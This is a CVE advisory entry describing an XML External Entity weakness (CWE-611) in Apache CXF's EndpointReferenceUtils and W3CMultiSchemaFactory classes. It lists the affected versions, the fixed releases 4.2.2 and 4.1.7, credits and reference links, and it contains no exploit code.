CVE-2026-49875 | THREATINT

Description

Apache CXF's EndpointReferenceUtils and W3CMultiSchemaFactory classes construct a SAXParserFactory without the necessary JAXP hardening configurations, enabling out-of-band (OOB) external entity resolution. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fix this issue.

PUBLISHED Reserved 2026-06-02 | Published 2026-06-12 | Updated 2026-06-15 | Assigner apache

Problem types

CWE-611 Improper Restriction of XML External Entity Reference

Product status

Default status

unaffected

4.2.0 (semver) before 4.2.2

affected

Any version before 4.1.7

affected

Credits

Venkatraman Kumar (r3dw0lfsec), Securin finder

References

www.openwall.com/lists/oss-security/2026/06/11/2

lists.apache.org/thread/3kb9w5bg90xcp06fccoz9k3gpsvyy79o vendor-advisory

cve.org (CVE-2026-49875)

nvd.nist.gov (CVE-2026-49875)

Download JSON